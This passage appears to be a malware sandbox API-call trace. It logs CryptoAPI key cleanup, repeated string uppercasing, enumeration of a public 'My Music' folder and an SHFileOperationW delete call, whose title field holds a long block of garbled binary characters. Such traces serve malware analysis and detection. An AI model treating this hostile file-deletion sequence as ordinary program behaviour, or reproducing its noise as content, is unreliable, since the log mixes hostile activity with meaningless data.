lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0223.380] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aab770, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0223.381] CryptDestroyKey (hKey=0x9e2238) returned 1 [0223.381] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0223.381] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0223.381] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0223.381] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0223.381] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0223.381] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0223.381] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0223.381] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0223.381] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0223.381] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0223.381] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0223.381] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0223.381] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0223.381] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0223.381] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0223.381] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0223.381] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0223.381] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0223.381] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0223.381] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0223.381] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0223.381] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0223.381] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0223.381] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.382] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0223.382] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.382] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0223.382] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.382] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.382] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0223.382] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0223.382] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0223.382] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0223.382] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0223.382] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0223.382] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.382] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0223.382] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0223.382] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0223.382] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0223.382] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0223.382] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.382] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0223.382] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0223.382] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0223.382] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0223.382] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0223.382] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0223.382] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0223.383] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0223.383] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0223.383] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0223.383] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0223.383] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0223.383] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f70c0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0223.383] CryptReleaseContext (hProv=0xa7bf78, dwFlags=0x0) returned 1 [0223.383] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.383] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0223.383] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0223.383] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0223.383] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0223.383] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0223.383] FreeLibrary (hLibModule=0x76390000) returned 1 [0223.383] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.383] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0223.383] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.383] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.383] CloseHandle (hObject=0x4b0) returned 1 [0223.384] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0223.384] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0223.384] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Documents/My Music", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\Public\\Documents\\My Music", lpFilePart=0x8cedf4*="My Music") returned 0x22 [0223.384] GetFileAttributesW (lpFileName="C:\\Users\\Public\\Documents\\My Music" (normalized: "c:\\users\\public\\documents\\my music")) returned 0x2416 [0223.384] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents\\My Music\\*.*", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x15, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x120a58, ftLastAccessTime.dwLowDateTime=0x47558b, ftLastAccessTime.dwHighDateTime=0x1, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x4a8178, nFileSizeHigh=0x7626d180, nFileSizeLow=0x0, dwReserved0=0x8cf060, dwReserved1=0x413764, cFileName="", cAlternateFileName="Ƙʦ桰ʪ")) returned 0xffffffff [0223.384] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0223.384] GetLastError () returned 0x6 [0223.384] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0223.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0223.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5f0 | out: hHeap=0x2af0000) returned 1 [0223.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0223.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0223.385] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0223.385] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab518 [0223.385] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0223.385] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0223.385] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0223.385] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0223.385] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7220 [0223.385] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0223.385] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0223.385] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0223.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0223.385] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0223.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0223.385] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0223.385] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x29f7878 [0223.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0223.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0223.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7220 | out: hHeap=0x2af0000) returned 1 [0223.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0223.385] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0223.385] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0223.385] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0223.385] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0223.386] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab440 [0223.386] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0223.386] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0223.386] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0223.386] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0223.386] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0223.386] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0223.386] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0223.386] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x46) returned 0x2a5d660 [0223.386] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Documents/My Music", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\Public\\Documents\\My Music", lpFilePart=0x8cf650*="My Music") returned 0x22 [0223.386] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5d660 | out: hHeap=0x2af0000) returned 1 [0223.386] GetFileAttributesW (lpFileName="C:\\Users\\Public\\Documents\\My Music" (normalized: "c:\\users\\public\\documents\\my music")) returned 0x2416 [0223.386] SHFileOperationW (in: lpFileOp=0x8cf868*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\Public\\Documents\\My Music", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="籨ǿ畍䑬癩噗ֽ㣚ᵗ˷殍Ķᐊ둲?ᒰ陣ꙭ䐫୥垇摩䱥呲훷뭬뙯䋈䡹氨犖灣뉹᙭捦㸩㵓穬㡗标公ᒞ◶쁆⋓畑臞涃秘ِ໩㘍潸ѵ噾බ⼄䘗똆伜陰嬈ᬡ㞙䦽箣㤵칗ஆ룑䴻⪱谐໅┺㎻ꌇᐟፓ潐?涟鷮掊鼥䘕畬띳贂梕畂笛贆襔꿡惿濸桬汥㍰匲瀺潨魫盙䕰舤瑴⅗恓覠쉎吋眶蘏큩[瑁扴獵惏ꋗ䁳倠㍹쐟н蹣최維矓ꜯᐝ낆쪆㍶䢢䶇?儕⏁㮰剭蔣飇䥬䇻栵刬洠傧겴玀뱢颻㝤䱶慯ᬝ正捓䛚껐景䔟螃䄉᭤慎항ာ션Ѱ卧脮样ᯋ좐㈶퐨譁옙ꛬ﹡̻婃籙밚䙩虓䔁ㆣ芵⮣鱌坶ぉᖴ얶䄵ꙴ嬣厶챰礟摴턦䡡轫楐挦梧൜栆?땋䞎罋怦똱砕⑐坨⨛蜎培껛铕닥璍嶫਺Җᒖꊵ䞉啰㝍檑⣅昩궬榶䔌㜵끛ꬅ㥭⡑汒酯墣엘≩ᵷ뜱॥ጐᜫ⼯떱垴ㅵ䓺둘㭡礚㥰獼噫굻獰慞塣?喆◍䁖艵༜喻䰭扡튚앱䞘狒䱤毈惌ⱶ潪幃呰Ṕ䵤囌⡘솆醥䵅㋱倓콬鬕쁮Ϛ꒚溔嚸槐탲셱⌖䜱押㶬짌ꄖ唗汮촛坩䔎핽?龎ଗȀ涌ꋦಮ퀻䋝ᄀᘇ㠜픭状梙涏⋣珙⍏㨬ᭂᰯ專ࢋꕅ̋瀮뾊ㅫ쟆揥厪塹祼췚ࢡ砕턎?黩ᢰ㝬嗢擴ຊ瓛艡ᵓ蛛왡落ꪺᯙ畄⁣錮굽춡ꏤᕘ媤估⋇辰鼠摁Ɽ≏٬䇦ᬋ퇡嘬힕≏๬挌嗗읓䦻㡳靮ᜃ爄칐ᕷ됆党ꟑ൩᥯맱獁죚⒀덍륍ⷜ篭ἐᒜ壸精鰥Ḯ茋᲎饰䏘໛u䙤痐붮⥅攖┱傌﮼쾳ᕡᙁ伏䵅舒硖鎀䱨懇䱛เ邏ጶᶐ匙씆Ĕ叧葿⼑㪚票⥤녋᣷㥏ト㖀玳鑴煯缡ά웯勗㤹㸙湛嘒᭐Ԏ៬䱓䵃Ϊ瑒䈬꺜瞔ᾰȄ凘娩捸?犺䶽삕Ⅵֶ逯끘慁熰睊侳ก쬬Ľ佤㑦磦༆礛ᅐ힠나敯硇⴨၈밈⬗뗴롧坃㌝둺䬫䬡睥蕝껢ᡮ᲍肽勂ᾄ䄅?ઔ煗簼鳥ꝸቮ椒ꗎ抄皁詽汲ᔩ뚌愇렩慪枰蓺ꭆ吋歯餔୪출렣☎䜅츐槞枌ࠂ뫞䶅鼴㐂ⴰ䯘쭗ꁸ萵棜枞ϰℴ畺惫ɣ脠∻ҍ䅸汣笿梗旲撒ᆣ삗芭퇛뽌䭯귭㿣⦃曥ସ㛭?⑛讔ﬔ?匏ٻ扸ต靿虹뜄魔檆獵ꄣ㣧㠬??桓໪샤瑵槐原⋮竻湤爦붧㒭Ȃ䦌㱭蕌ᶁﻣ齟匣oᡜ㡬怭揮㭠求㽮ᄩ➚὜⦇什㶃綄祜≐⌸⯺໖{䦝ꁣभܛ릻?뤊㻇령컃및܆ᜆᒅ쪩웓圜堣제?䲄Ꮭⱁ᎙牁ୣ둸娸㏯鈲椞琌㋱軽䅜ᴈ낲攣ᜥ?魤⦰椦퉸嫽䌚䃤ࡧ䏽ఈ䁊誽Ồ꧜강⽰䍄亄瑣䷍꓋档求䓛鸥瑰⇷᱃ܜ옲黏띝쬎䞏쬕㠦҉ꬆ剺⻂퀖祬睆蓿鯃剻懤ℱ敩?汽퀓牏뉧⾞ϰ⤖䉅鍫湒泮㐓⭱魃솭냊睳匕蜮탧嘪牂册䟥煱唰᭗썆፪丞ꋃ君丈꣎ଦ?圓끎漞쪱沀堁⽺햵皖⥸簧籑?琫멑쀗괂俱ʦ畮혙⁰䴩婫摲顑采鲲쵹潓ーꃢ䑡?卌䑉⹆⎳乴཭༠⤣ƀ䟚㉕褲旇찘᭴ὕㄹ̆䚑쯴ꂙ옻⫭修䡮冧戈툔뙫ᾥڂⅼᅧ?䇁弣꯯⭤ꓸꡂ硴潭萕ᰊ佋?䨣ฦ硬䱹켄撚欦휖䦫ꞟ〢頧೿驩榦଄ₒ؟퍍괴⠦ᠧ┇꘣퍹ꐴ鬩!ਂꚚ驩뤉䷜អ퉸歏ꀈ偅ࠔ㲽냅଄慂╳ꌂ㶒?燚獣侪腵沓妣ၸ樔?琬瑖ោ县⹈撸㝆퍈煮㐴䖍沔捹蛡減㨧ΰ鞸?❷ꉡ?摛襾ꮷ䞃ݡ踘⬰歆뱲䕥灀❹慍〟贤騁똔ᰟ杅也ꩯ祦䅪圩斍伩ፁ뺲ꁛ㰯샤莢?『떂䣘኎槦妙膎Ӟၤ⹝潢劊끯골ḱ쫩ꄸ쓆咬ੰ丛윜㢎⣖⥣唛劫쮪灰❇삁Ҩ叮扵䌥䀶?違浳潚᱊㣰﹀械큫?偮礩?黠랭ꯨ栞柠䢍粙턭ⴜ斔舝⵨勥촐롤呯Ṱ琞溁耱Ɽ쑲겍Ꙑﻑ龜遮企ল月墡Ǡゑ⾌逝ၖᵳ꘨튡歛洔ᵉ뀣?㘈倷鹴呋૗榞〗앢桁禣죇ᒁ?낰㎇၍੆뢲Ըāʼnꈛꏔ沐蚃녨奦呤豇嫀洜䉕㭔ⵠ刃핵᛭屎藡롃顃杬ᙂ噴?榇霫⡦Ұ枌᭔୻㪝뜊뜗⌋⎭瀕캵챩쯍䀥꠷ọ덠ቭ徠嵥㴮筴Ꮌ匷?ഊ☓気?솟ṩ퀉?靄等硢긜蠉Ἥ㸉蟜ᥩ좧鳪³῭닢ᰫᎥ穗℞刕曚ꂱ箰뜩癛훇ꔶ᷍⍓䜛㕗驀㐿狢๤茇贅啁級ஐ捗歡䍺㴙藌䘵릙्抩쐸㒪᲍蒛ⵣ᭝拴緋ᛞ䟈嘙ᝫ졣屩)䌍Ў鐄㋵ㄥ딮⃠更᥼ሼ䆼訟뗭涆児錧餝娆ࠡ侏ꛜౕ쌫裊팛浏៑ֻ釆攣뭙桙ᡩᏱ폪腚Ⅴ楖楳㏕㊺농፟䖀䟙곯꣢칣棘㕛ⷀΪ㔝虘ऌ펾潔羣ᙱ뀩泒ﯤ䔠蠂㠪Ϲ肾魐垜唬⤘ꅀ숛찈䏷ຈ㊽ꗋ䱛ᮄ耸鏑뢉ŝ䘭?瘹䢄묑䞇똭᫁笉ᯥ㖤퀑љ榔䗋㥁嵭䵘뾧ڊ╛漫热쯙㉧缿囓ꇰ焋뮁뇺Š턅炿셹穎щ휢뒬跕鈧䞂껑砭玿䷋酇蹢殲鑁ɚ뤏禟⥂큸⵽爲堤獀ऀ賣웕삮ౕᡡ濏씸探厱?畑ࢇꗇ靚ﱋ뇩ﮆ癡?匈떍斜ᅭ쁄䝮蹽勂羁䥽Ự봣ᕱځ⸕ꤗ叙᪱䜰퍯驁椾倯殞豘੸唿牮㓇ꛠⶍ歵搞⥔⋄촭䞹ꐄ齚?莬ꁓ졦?ࣚ혮疗ㄫ鎀锽针虚℅뱗⡲ꂃ㠼⇶宄﵇敗櫀䠟ㄥЩ嘎續둈舅뿽䱮⌻?肊⥍殻湏ᷚ⍓濉耹৫喦䍈炠嵅?⮖ꝃ?̴⎄⌝䕆ࡖ٤ᬻ砓㝫㌈쯪飳?㴨資伪᫃蒊晴貣È퐳䈄렉栁ⶅ惂吡楣ﴴ榦ꞟ鑮ヤҗ༕괴骃ᐑቻഄ퍳䴴˓Ѓ጗ꡚ偵뵴Ё⥯ꐴऔӓ뜹붼䔤䰶吁뫬伥翳氁⌀ଁਁ") | out: lpFileOp=0x8cf868*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\Public\\Documents\\My Music", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, 